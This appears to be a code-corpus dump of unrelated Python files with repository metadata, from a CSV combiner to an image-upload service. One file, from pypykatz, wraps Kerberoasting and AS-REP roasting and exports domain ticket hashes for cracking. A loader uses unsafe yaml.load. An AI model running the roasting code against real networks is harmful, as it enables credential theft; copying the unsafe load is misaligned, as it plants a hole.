def _parse_file(file, file_type):
    if file_type == 'json':
        result = json.load(file)
    elif file_type == 'yaml':
        # If the file is empty, then the return value of load
        # function is None. In that case an empty dict is assigned
        # to the result variable.
        result = yaml.load(file, Loader=yaml.Loader) or {}
    else:
        raise ValueError('Unsupported file type')
    return result


def _get_file_type(file_path):
    _, file_ext = os.path.splitext(file_path)
    if file_ext == '.json':
        return 'json'
    elif file_ext == '.yml' or file_ext == '.yaml':
        return 'yaml'
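
# Illustrative usage sketch (not part of the original module): file names are made up.
#
#   data = load_file('file1.json')    # parsed with json.load
#   data = load_file('file2.yaml')    # parsed with yaml.load, {} if the file is empty
#   load_file('file3.txt')            # raises ValueError('Unsupported file type')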
| 26.193548 | 66 | 0.642857 | 119 | 812 | 4.168067 | 0.361345 | 0.129032 | 0.048387 | 0.060484 | 0.16129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258621 | 812 | 30 | 67 | 27.066667 | 0.82392 | 0.162562 | 0 | 0 | 0 | 0 | 0.075444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6253782f1b223004bc66779acddd253d42bb4adb | 1,316 | py | Python | setup.py | BioGeek/pyseqlogo | e41d9645c7a9fa5baf3deab281acf40ea5357f64 | [
"MIT"
] | 24 | 2017-10-23T16:06:18.000Z | 2022-03-04T14:09:25.000Z | setup.py | BioGeek/pyseqlogo | e41d9645c7a9fa5baf3deab281acf40ea5357f64 | [
"MIT"
] | 7 | 2020-11-19T13:55:54.000Z | 2021-11-30T03:16:33.000Z | setup.py | BioGeek/pyseqlogo | e41d9645c7a9fa5baf3deab281acf40ea5357f64 | [
"MIT"
] | 16 | 2018-02-01T16:12:07.000Z | 2021-09-28T03:53:11.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
with open('README.rst') as readme_file:
    readme = readme_file.read()

with open('HISTORY.rst') as history_file:
    history = history_file.read()

with open('requirements.txt') as reqs:
    requirements = reqs.readlines()

test_requirements = requirements + ['pytest']

setup(
    name='pyseqlogo',
    version='0.1.0',
    description="Python package to analyse ribosome profiling data",
    long_description=readme + '\n\n' + history,
    author="Saket Choudhary",
    author_email='saketkc@gmail.com',
    url='https://github.com/saketkc/pyseqlogo',
    packages=[
        'pyseqlogo',
    ],
    package_dir={'pyseqlogo': 'pyseqlogo'},
    include_package_data=True,
    install_requires=requirements,
    license="BSD license",
    zip_safe=False,
    keywords='pyseqlogo',
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        "Programming Language :: Python :: 2",
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
    ],
    test_suite='tests',
    tests_require=test_requirements)
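
# Illustrative usage sketch (not part of the original file): typical ways this setup
# script is invoked from the package root.
#
#   pip install .          # build and install pyseqlogo with the requirements.txt deps
#   python setup.py test   # run the 'tests' suite declared via test_suite above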
| 28.608696 | 68 | 0.643617 | 144 | 1,316 | 5.777778 | 0.569444 | 0.091346 | 0.120192 | 0.038462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010638 | 0.214286 | 1,316 | 45 | 69 | 29.244444 | 0.794004 | 0.031915 | 0 | 0.054054 | 0 | 0 | 0.397013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.027027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62552b8743ab6f12c3ce33e49ef1aceb7b95482d | 1,238 | py | Python | combine_csv.py | dsschult/scripts | 69a738d0d71081825c5e79f0cb52b31fd7396ebb | [
"MIT"
] | null | null | null | combine_csv.py | dsschult/scripts | 69a738d0d71081825c5e79f0cb52b31fd7396ebb | [
"MIT"
] | 1 | 2017-09-12T20:53:44.000Z | 2017-10-05T14:07:12.000Z | combine_csv.py | dsschult/scripts | 69a738d0d71081825c5e79f0cb52b31fd7396ebb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
import csv
out = sys.argv[-1]
header = []
data = {}
for infile in sys.argv[1:-1]:
    print('reading', infile)
    with open(infile, 'r') as csvfile:
        csvfilereader = csv.reader(csvfile)
        local_header = []
        for i, row in enumerate(csvfilereader):
            if i == 0:  # header
                local_header = row[1:]
                if not header:
                    header = row[1:]
            else:
                id = row[0]
                # materialize the values so the debug print shows numbers, not a map object
                row_data = list(map(float, row[1:]))
                print(row_data)
                if id not in data:
                    data[id] = {c: d for c, d in zip(local_header, row_data)}
                else:
                    for c, d in zip(local_header, row_data):
                        if c in data[id]:
                            data[id][c] += d
                        else:
                            data[id][c] = d

print('writing', out)
with open(out, 'w') as outfile:
    outwriter = csv.writer(outfile, quoting=csv.QUOTE_MINIMAL)
    outwriter.writerow(['site'] + header)
    for id in sorted(data, key=lambda id: sum(data[id].values()), reverse=True):
        outwriter.writerow([id] + [data[id][c] if c in data[id] else 0 for c in header])
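
# Illustrative usage sketch (not part of the original script): file names are made up.
# Rows are keyed by the first column ('site'); numeric columns with the same header are
# summed across all input files, and output rows are sorted by their total, descending.
#
#   python combine_csv.py january.csv february.csv combined.csv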
| 32.578947 | 86 | 0.495153 | 163 | 1,238 | 3.705521 | 0.337423 | 0.069536 | 0.046358 | 0.039735 | 0.129139 | 0.092715 | 0.092715 | 0.092715 | 0.092715 | 0 | 0 | 0.011688 | 0.378029 | 1,238 | 37 | 87 | 33.459459 | 0.772727 | 0.021809 | 0 | 0.090909 | 0 | 0 | 0.016543 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.060606 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62594c8ef5630b783a3a7d27f7863d52f93f200b | 2,510 | py | Python | examples/NeuralNetwork/normalization_multi_input.py | MambaWong/depthai-python-1 | 0d15abd77fd82b4a70e096ea5bb99237a17c9862 | [
"MIT"
] | 9 | 2020-03-10T15:10:02.000Z | 2020-06-01T22:58:04.000Z | examples/NeuralNetwork/normalization_multi_input.py | MambaWong/depthai-python-1 | 0d15abd77fd82b4a70e096ea5bb99237a17c9862 | [
"MIT"
] | 11 | 2020-03-11T20:42:30.000Z | 2020-06-10T11:53:49.000Z | examples/NeuralNetwork/normalization_multi_input.py | MambaWong/depthai-python-1 | 0d15abd77fd82b4a70e096ea5bb99237a17c9862 | [
"MIT"
] | 2 | 2020-04-23T19:20:04.000Z | 2020-05-12T00:20:34.000Z | #!/usr/bin/env python3
from pathlib import Path
import sys
import numpy as np
import cv2
import depthai as dai
SHAPE = 300
# Get argument first
nnPath = str((Path(__file__).parent / Path('../models/normalize_openvino_2021.4_4shave.blob')).resolve().absolute())
if len(sys.argv) > 1:
    nnPath = sys.argv[1]

if not Path(nnPath).exists():
    import sys
    raise FileNotFoundError(f'Required file/s not found, please run "{sys.executable} install_requirements.py"')
p = dai.Pipeline()
p.setOpenVINOVersion(dai.OpenVINO.VERSION_2021_4)
camRgb = p.createColorCamera()
# Model expects values in FP16, as we have compiled it with `-ip FP16`
camRgb.setFp16(True)
camRgb.setInterleaved(False)
camRgb.setPreviewSize(SHAPE, SHAPE)
nn = p.createNeuralNetwork()
nn.setBlobPath(nnPath)
nn.setNumInferenceThreads(2)
script = p.create(dai.node.Script)
script.setScript("""
# Run script only once. We could also send these values from host.
# Model formula:
# output = (input - mean) / scale
# This configuration will subtract all frame values (pixels) by 127.5
# 0.0 .. 255.0 -> -127.5 .. 127.5
data = NNData(2)
data.setLayer("mean", [127.5])
node.io['mean'].send(data)
# This configuration will divide all frame values (pixels) by 255.0
# -127.5 .. 127.5 -> -0.5 .. 0.5
data = NNData(2)
data.setLayer("scale", [255.0])
node.io['scale'].send(data)
""")
# Re-use the initial values for multiplier/addend
script.outputs['mean'].link(nn.inputs['mean'])
nn.inputs['mean'].setWaitForMessage(False)
script.outputs['scale'].link(nn.inputs['scale'])
nn.inputs['scale'].setWaitForMessage(False)
# Always wait for the new frame before starting inference
camRgb.preview.link(nn.inputs['frame'])
# Send normalized frame values to host
nn_xout = p.createXLinkOut()
nn_xout.setStreamName("nn")
nn.out.link(nn_xout.input)
# Pipeline is defined, now we can connect to the device
with dai.Device(p) as device:
    qNn = device.getOutputQueue(name="nn", maxSize=4, blocking=False)
    shape = (3, SHAPE, SHAPE)

    while True:
        inNn = np.array(qNn.get().getData())
        # Get back the frame. It's currently normalized to -0.5 .. 0.5
        frame = inNn.view(np.float16).reshape(shape).transpose(1, 2, 0)
        # To get the original frame back (0-255), we multiply all frame values (pixels) by 255 and then add 127.5 to them
        frame = (frame * 255.0 + 127.5).astype(np.uint8)
        # Show the initial frame
        cv2.imshow("Original frame", frame)

        if cv2.waitKey(1) == ord('q'):
            break
| 31.375 | 121 | 0.700398 | 382 | 2,510 | 4.568063 | 0.447644 | 0.018338 | 0.024069 | 0.034384 | 0.080229 | 0.067622 | 0 | 0 | 0 | 0 | 0 | 0.048746 | 0.158167 | 2,510 | 79 | 122 | 31.772152 | 0.777094 | 0.198805 | 0 | 0.072727 | 0 | 0 | 0.327836 | 0.083458 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.109091 | 0 | 0.109091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62632619459e288669a5fee1ef7042535b7e5247 | 3,132 | py | Python | image_upload/routers/upload.py | rso-school-project/image-upload | 91d79868265cba28aedef91b4174b890959843a0 | [
"MIT"
] | null | null | null | image_upload/routers/upload.py | rso-school-project/image-upload | 91d79868265cba28aedef91b4174b890959843a0 | [
"MIT"
] | null | null | null | image_upload/routers/upload.py | rso-school-project/image-upload | 91d79868265cba28aedef91b4174b890959843a0 | [
"MIT"
] | null | null | null | import time
from PIL import Image
import hashlib
import numbers
from google.cloud import pubsub_v1
from typing import List
from fastapi import APIRouter, Depends, UploadFile, File, Form, HTTPException
from starlette.requests import Request
from func_timeout import func_set_timeout
from sqlalchemy.orm import Session
from google.cloud import storage
from image_upload import settings
from image_upload.utils import fallback
from image_upload.database import crud, models, schemas, get_db, engine
try:
    models.Base.metadata.create_all(bind=engine, checkfirst=True)
except:
    pass
router = APIRouter()
# Instantiates a client
storage_client = storage.Client()
bucket_name = "super_skrivni_bozickov_zaklad"
bucket = storage_client.bucket(bucket_name)
# Pub/sub.
publisher = pubsub_v1.PublisherClient()
subscriber = pubsub_v1.SubscriberClient()
topic_name = 'projects/{project_id}/topics/{topic}'.format(
project_id='forward-leaf-258910',
topic='image_to_process',
)
subscription_name = 'projects/{project_id}/subscriptions/{sub}'.format(
project_id='forward-leaf-258910',
sub='image-upload',
)
def callback(message):
    print(message)
    tags = message.attributes["image_tags"]
    image_id = message.attributes["image_id"]
    crud.update_tags(db=next(get_db()), image_id=int(image_id), tags=tags)
    message.ack()
future = subscriber.subscribe(subscription_name, callback)
@router.post('/images', response_model=schemas.Image)
def upload(*, user_id: int = Form(...), file: UploadFile = File(...), db: Session = Depends(get_db)):
    try:
        Image.open(file.file)
    except:
        raise HTTPException(status_code=400, detail='Uploaded file is not an image.')

    if not isinstance(user_id, numbers.Number):
        raise HTTPException(status_code=400, detail='user_id is not a number.')

    # Get hash.
    file_hash = hashlib.sha1(file.filename.encode('utf-8')).hexdigest() + "." + file.filename.split(".")[-1]

    # Save to DB.
    new_image = crud.create_image(db=db, file_name=file.filename, file_hash=file_hash, user_id=user_id)
    iid = new_image.id

    # Upload to GC, append file ID to hash.
    file.file.seek(0)
    try:
        blob = bucket.blob(str(iid) + file_hash)
        blob.upload_from_file(file.file)
    except:
        crud.delete_image(db=db, image_id=iid)
        raise HTTPException(status_code=400, detail='Upload to gCloud failed.')

    # Send to image processor.
    url_r = str(iid) + file_hash
    url_l = "https://storage.googleapis.com/super_skrivni_bozickov_zaklad/"
    publisher.publish(topic_name, b'', image_id=str(iid), image_url=url_l + url_r)

    return new_image
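
# Illustrative request sketch (not part of the original module): how a client would
# exercise the /images endpoint above; host, port and any route prefix are assumptions.
#
#   curl -X POST http://localhost:8000/images -F "user_id=1" -F "file=@cat.jpg"
#
# On success the endpoint returns the stored Image record; the uploaded object is stored
# in the bucket as "<image id><sha1 of the file name>.<extension>", and a Pub/Sub message
# carrying its public URL is published for the image-processing service.
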
@router.delete('/images/{image_id}', response_model=schemas.Image)
def delete_image(image_id: int, db: Session = Depends(get_db)):
    db_image = crud.delete_image(db=db, image_id=image_id)
    if db_image is None:
        raise HTTPException(status_code=404, detail='Image not found')
    return db_image
@router.get('/settings')
async def test_configs(request: Request):
return {"Config for X:": f"{settings.config_x}", "Config for Y:": f"{settings.config_y}"}
| 29.271028 | 108 | 0.724457 | 442 | 3,132 | 4.945701 | 0.346154 | 0.035224 | 0.043916 | 0.051235 | 0.148673 | 0.103843 | 0.023788 | 0 | 0 | 0 | 0 | 0.011711 | 0.154853 | 3,132 | 106 | 109 | 29.54717 | 0.814129 | 0.036718 | 0 | 0.114286 | 0 | 0 | 0.149169 | 0.035216 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042857 | false | 0.014286 | 0.2 | 0 | 0.285714 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62632d07fbec61396b9f199a3518e46ccf03463e | 7,678 | py | Python | src/test/tinc/tincrepo/mpp/lib/GPFDIST.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | 1 | 2017-09-15T06:09:56.000Z | 2017-09-15T06:09:56.000Z | src/test/tinc/tincrepo/mpp/lib/GPFDIST.py | guofengrichard/gpdb | 29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | src/test/tinc/tincrepo/mpp/lib/GPFDIST.py | guofengrichard/gpdb | 29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3 | [
"PostgreSQL",
"Apache-2.0"
] | 1 | 2018-12-04T09:13:57.000Z | 2018-12-04T09:13:57.000Z | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import platform
import time
import tinctest
from gppylib.commands.base import Command
from tinctest.lib import run_shell_command
class GPFDISTError(Exception):
    pass


class GPFDIST:

    def __init__(self, port, hostname, directory=None):
        "init"
        self.port = port
        self.hostname = hostname
        self.secure = False
        self.ssl_cert = ""
        if directory is None:
            directory = os.getcwd()
        self.directory = directory
        self.gphome = os.environ.get("GPHOME")
        # Ensure we use compatible ps command on Solaris platform
        self.ps_command = 'ps'
        if platform.system() in ['SunOS']:
            self.ps_command = '/bin/ps'

    def gethost(self):
        return self.hostname

    def getport(self):
        return self.port

    def getdir(self):
        return self.directory

    def startGpfdist(self, options="", port=None, raise_assert=True, ssl=None):
        """
        start hosting the data
        @comment: Why do we need to ssh to a host that is localhost
        killGpfdist does not support kill process on other host
        @note: If we are to use ssh subprocess, we will go to the home folder,
        let's revisit this with remote command so that it works for starting
        gpfdist on remote host
        """
        if port is None:
            port = self.port
        else:
            port = str(port)
        if ssl is None:
            ssl = ""
        else:
            self.secure = True
            self.ssl_cert = ssl
            ssl = "--ssl %s" % self.ssl_cert
        directory = self.directory

        gpfdist_cmd = "gpfdist -p %s -d %s %s %s" % (port, directory, options, ssl)
        cmd = "gpssh -h %s 'source %s/greenplum_path.sh; %s > /dev/null &'" % (self.hostname, self.gphome, gpfdist_cmd)
        res = {'rc': 0, 'stderr': '', 'stdout': ''}
        run_shell_command(cmd, 'gpfdist', res)
        if res['rc'] > 0:
            raise Exception("Failed to start gpfdist on host %s and port %s with non-zero rc" % (self.hostname, port))
        return self.check_gpfdist_process(port=port, raise_assert=raise_assert)

    def check_gpfdist_process(self, wait=60, port=None, raise_assert=True):
        """
        Check for the gpfdist process
        Wait at least 60s until gpfdist starts, else raise an exception
        """
        if port is None:
            port = self.port
        process_started = False
        count = 0
        while (not process_started and count < wait):
            cmd_str = " | ".join([
                self.ps_command + ' -ef',
                'grep \"[g]pfdist -p %s\"' % (port)])
            cmd = "gpssh -h %s '%s'" % (self.hostname, cmd_str)
            res = {'rc': 0, 'stderr': '', 'stdout': ''}
            run_shell_command(cmd, 'gpfdist process check', res)
            content = res['stdout']
            if len(content) > 0:
                if content.find("gpfdist -p %s" % port) > 0:
                    process_started = self.is_gpfdist_connected(port)
                    if process_started:
                        return True
            count = count + 1
            time.sleep(1)
        if raise_assert:
            raise GPFDISTError("Could not start gpfdist process")
        else:
            tinctest.logger.warning("Could not start gpfdist process")

    def is_gpfdist_connected(self, port=None):
        """
        Check gpfdist by connecting after starting process
        @return: True or False
        @todo: Need the absolute path
        """
        if port is None:
            port = self.port
        url = "http://%s:%s" % (self.hostname, port)
        if self.secure:
            url = url.replace("http:", "https:") + " -k"
        cmd_str = "curl %s" % url
        res = {'rc': 0, 'stderr': '', 'stdout': ''}
        run_shell_command(cmd_str, 'gpfdist process check', res)
        content = res['stdout']
        if content.find("couldn't") >= 0:
            return False
        return True

    def is_port_released(self, port=None):
        """
        Check whether the port is released after stopping gpfdist
        @return: True or False
        """
        if port is None:
            port = self.port
        cmd_str = "netstat -an | grep %s" % port
        cmd = "gpssh -h %s '%s'" % (self.hostname, cmd_str)
        res = {'rc': 0, 'stderr': '', 'stdout': ''}
        run_shell_command(cmd, 'gpfdist port check', res)
        content = res['stdout']
        # strip hostname prefix from gpssh output
        content = content.replace(self.hostname, '').strip('[]').strip()
        if len(content) > 0:
            return False
        return True

    def is_gpfdist_killed(self, port=None, wait=1):
        """
        Check whether the gpfdist process is killed
        """
        if port is None:
            port = self.port
        process_killed = False
        count = 0
        while (not process_killed and count < wait):
            cmd_str = " | ".join([
                self.ps_command + ' -ef',
                'grep \"[g]pfdist -p %s\"' % (port)])
            cmd = "gpssh -h %s '%s'" % (self.hostname, cmd_str)
            res = {'rc': 0, 'stderr': '', 'stdout': ''}
            run_shell_command(cmd, 'gpfdist process check', res)
            content = res['stdout']
            # strip hostname prefix from gpssh output
            content = content.replace(self.hostname, '').strip('[]').strip()
            if len(content) > 0 or content.find("gpfdist -p %s" % port) > 0:
                tinctest.logger.warning("gpfdist process still exists on %s:%s" % (self.hostname, self.port))
            else:
                return True
            count = count + 1
            time.sleep(1)
        tinctest.logger.warning("gpfdist process not killed on %s:%s" % (self.hostname, self.port))
        return False

    def killGpfdist(self, wait=60, port=None):
        """
        kill the gpfdist process
        @change: Johnny Soedomo, check from netstat whether the system has released the process rather than waiting a flat 10s
        @todo: Support for stopping gpfdist process on remote host
        """
        if port is None:
            port = self.port
        cmd_str = ' | '.join([self.ps_command + " -ef",
                              "grep \"[g]pfdist -p %s\"" % (port),
                              "awk '\"'\"'{print $2}'\"'\"'",
                              "xargs kill"])
        cmd = "gpssh -h %s '%s'" % (self.hostname, cmd_str)
        res = {'rc': 0, 'stderr': '', 'stdout': ''}
        run_shell_command(cmd, 'kill gpfdist', res)
        if not self.is_gpfdist_killed():
            raise GPFDISTError("Could not kill gpfdist process on %s:%s" % (self.hostname, self.port))

        # Make sure the port is released
        is_released = False
        count = 0
        while (not is_released and count < wait):
            is_released = self.is_port_released()
            count = count + 1
            time.sleep(1)
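
# Illustrative usage sketch (not part of the original module): host name, port and
# directory are made up; assumes a Greenplum test environment where gpssh and gpfdist
# are available on the PATH.
#
#   gpfdist = GPFDIST(port='8080', hostname='localhost', directory='/data/external')
#   gpfdist.startGpfdist()    # starts gpfdist via gpssh and waits until it answers
#   ...
#   gpfdist.killGpfdist()     # kills the process and waits for the port to be released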
| 36.561905 | 126 | 0.563558 | 955 | 7,678 | 4.458639 | 0.246073 | 0.028182 | 0.011273 | 0.026303 | 0.361202 | 0.31024 | 0.293095 | 0.24636 | 0.207374 | 0.191874 | 0 | 0.008484 | 0.324564 | 7,678 | 209 | 127 | 36.736842 | 0.812572 | 0.219458 | 0 | 0.426471 | 0 | 0.007353 | 0.141295 | 0.003645 | 0 | 0 | 0 | 0.009569 | 0.029412 | 1 | 0.073529 | false | 0.007353 | 0.044118 | 0.022059 | 0.213235 | 0.007353 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6266b4ad7653f1d02ea5b3cceb5fbba1ed6b3402 | 4,605 | py | Python | pypykatz/kerberos/cmdhelper.py | m0xbf/pypykatz-copy | 39d8b06861d9ccd615e8107707f56f6556fb15a0 | [
"MIT"
] | 5 | 2019-04-20T05:34:01.000Z | 2019-10-12T01:26:09.000Z | pypykatz/kerberos/cmdhelper.py | m0xbf/pypykatz-copy | 39d8b06861d9ccd615e8107707f56f6556fb15a0 | [
"MIT"
] | 1 | 2018-09-13T15:20:29.000Z | 2018-09-13T15:20:29.000Z | pypykatz/kerberos/cmdhelper.py | m0xbf/pypykatz-copy | 39d8b06861d9ccd615e8107707f56f6556fb15a0 | [
"MIT"
] | 8 | 2018-09-11T22:02:22.000Z | 2019-11-27T08:52:20.000Z | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
from pypykatz import logging
"""
Kerberos is not part of pypykatz directly.
This is a wrapper for minikerberos and winsspi packages
"""
class KerberosCMDHelper:
    def __init__(self):
        self.live_keywords = ['kerberos']
        self.keywords = []

    def add_args(self, parser, live_parser):
        live_group = live_parser.add_parser('kerberos', help='Kerberos (live) related commands')
        live_group.add_argument('-c', '--credential', help='Credential to be used. If omitted, the credentials of the current user are used. If specified, it will try to impersonate the user. (requires that the target user has a session on the local computer)')
        live_group.add_argument('--dc-ip', help='IP address or hostname of the LDAP server. Optional. If omitted will use registry to check for the DC.')
        live_group.add_argument('cmd', choices=['spnroast', 'asreproast'])
        live_group.add_argument('-o', '--out-file', help='File to store results in')
        live_group.add_argument('-t', '--target-file', help='List of target users to roast. One user per line. Format: asreproast->username spnroast->domain/username')
        live_group.add_argument('-u', '--target-user', action='append', help='Target users to roast in <realm>/<username> format or just the <username>, if -r is specified. Can be stacked.')
        live_group.add_argument('-r', '--realm', help='Kerberos Realm.')

    def execute(self, args):
        if len(self.keywords) > 0 and args.command in self.keywords:
            self.run(args)
        if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
            self.run_live(args)

    def run_live(self, args):
        from winsspi.sspi import KerberoastSSPI
        from minikerberos.security import TGSTicket2hashcat, APREPRoast
        from minikerberos.utils import TGTTicket2hashcat
        from minikerberos.communication import KerberosSocket
        from minikerberos.common import KerberosTarget
        from pypykatz.commons.winapi.machine import LiveMachine

        if not args.target_file and not args.target_user:
            raise Exception('No targets loaded! Either -u or -t MUST be specified!')

        machine = LiveMachine()

        realm = args.realm
        if not args.realm:
            realm = machine.get_domain()

        if args.cmd in ['spnroast', 'asreproast']:
            targets = []
            if args.target_file:
                with open(args.target_file, 'r') as f:
                    for line in f:
                        line = line.strip()
                        domain = None
                        username = None
                        if line.find('/') != -1:
                            # we take for granted that usernames do not have the char / in them!
                            domain, username = line.split('/')
                        else:
                            username = line
                        if args.realm:
                            domain = args.realm
                        else:
                            if domain is None:
                                raise Exception('Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file')

                        target = KerberosTarget()
                        target.username = username
                        target.domain = domain
                        targets.append(target)

            if args.target_user:
                for user in args.target_user:
                    domain = None
                    username = None
                    if user.find('/') != -1:
                        # we take for granted that usernames do not have the char / in them!
                        domain, username = user.split('/')
                    else:
                        username = user
                    if args.realm:
                        domain = args.realm
                    else:
                        if domain is None:
                            raise Exception('Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file')

                    target = KerberosTarget()
                    target.username = username
                    target.domain = domain
                    targets.append(target)

            results = []
            errors = []
            if args.cmd == 'spnroast':
                for spn_name in targets:
                    ksspi = KerberoastSSPI()
                    try:
                        ticket = ksspi.get_ticket_for_spn(spn_name.get_formatted_pname())
                    except Exception as e:
                        errors.append((spn_name, e))
                        continue
                    results.append(TGSTicket2hashcat(ticket))

            elif args.cmd == 'asreproast':
                dcip = args.dc_ip
                if args.dc_ip is None:
                    dcip = machine.get_domain()
                ks = KerberosSocket(dcip)
                ar = APREPRoast(ks)
                results = ar.run(targets)

            if args.out_file:
                with open(args.out_file, 'w') as f:
                    for thash in results:
                        f.write(thash + '\r\n')
            else:
                for thash in results:
                    print(thash)

            for err in errors:
                print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

            logging.info('SSPI based Kerberoast complete')

    def run(self, args):
        raise NotImplementedError('Platform independent kerberos not implemented!')
raise NotImplementedError('Platform independent kerberos not implemented!') | 33.860294 | 256 | 0.675136 | 633 | 4,605 | 4.835703 | 0.293839 | 0.023522 | 0.027442 | 0.045737 | 0.227377 | 0.196668 | 0.196668 | 0.196668 | 0.196668 | 0.196668 | 0 | 0.002772 | 0.216504 | 4,605 | 136 | 257 | 33.860294 | 0.845621 | 0.039739 | 0 | 0.27 | 0 | 0.06 | 0.269204 | 0.005802 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.07 | 0 | 0.13 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6266bd836140f1c3ba30f0075104aec7b0ac4181 | 9,354 | py | Python | guv/support/gunicorn_worker.py | timgates42/guv | d7bac2ca6a73cc2059969af08223b82f3e187922 | [
"MIT"
] | 120 | 2015-01-05T15:15:26.000Z | 2020-07-28T11:25:10.000Z | guv/support/gunicorn_worker.py | timgates42/guv | d7bac2ca6a73cc2059969af08223b82f3e187922 | [
"MIT"
] | 22 | 2015-01-12T21:52:32.000Z | 2017-01-22T18:18:20.000Z | guv/support/gunicorn_worker.py | timgates42/guv | d7bac2ca6a73cc2059969af08223b82f3e187922 | [
"MIT"
] | 13 | 2015-01-18T11:42:34.000Z | 2021-07-15T10:59:22.000Z | from functools import partial
import errno
import sys
from datetime import datetime
import socket
import ssl
import greenlet
import logging
from gunicorn import http, util
from gunicorn.http import wsgi
from gunicorn.http.wsgi import sendfile as o_sendfile
from gunicorn.workers import base
import guv
import guv.wsgi
from guv import hubs, greenthread, greenpool, StopServe, trampoline, gyield
from guv.greenio import socket as gsocket
from guv.support import get_errno, reraise
from guv.const import WRITE
from guv.exceptions import BROKEN_SOCK
ALREADY_HANDLED = object()
log = logging.getLogger('guv')
class AsyncWorker(base.Worker):
    """
    This class is a copy of the AsyncWorker included in gunicorn, with a few minor modifications:

    - Removed python 2 support
    - Improved request latency for keep-alive connections by yielding after each request
    - Graceful quit on ctrl-c by overriding handle_quit
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.worker_connections = self.cfg.worker_connections

    def handle_quit(self, sig, frame):
        """
        We override this because sys.exit() shouldn't be called. Instead, we should let the
        worker gracefully quit on its own.
        """
        # sys.stderr.write('handle_quit() frame: {0}, '
        #                  '{0.f_code.co_filename}:{0.f_code.co_name}:{0.f_lineno}\n'
        #                  .format(frame))
        sys.stderr.flush()
        self.alive = False

        # worker_int callback
        self.cfg.worker_int(self)
        # sys.exit(0)

    def timeout_ctx(self):
        raise NotImplementedError()

    def handle(self, server_sock, client_sock, addr):
        """Handle client connection

        The client may send one or more requests.
        """
        req = None
        try:
            parser = http.RequestParser(self.cfg, client_sock)
            try:
                server_name = server_sock.getsockname()
                if not self.cfg.keepalive:
                    req = next(parser)
                    self.handle_request(server_name, req, client_sock, addr)
                else:
                    # keepalive loop
                    while True:
                        req = None
                        with self.timeout_ctx():
                            req = next(parser)
                        if not req:
                            break
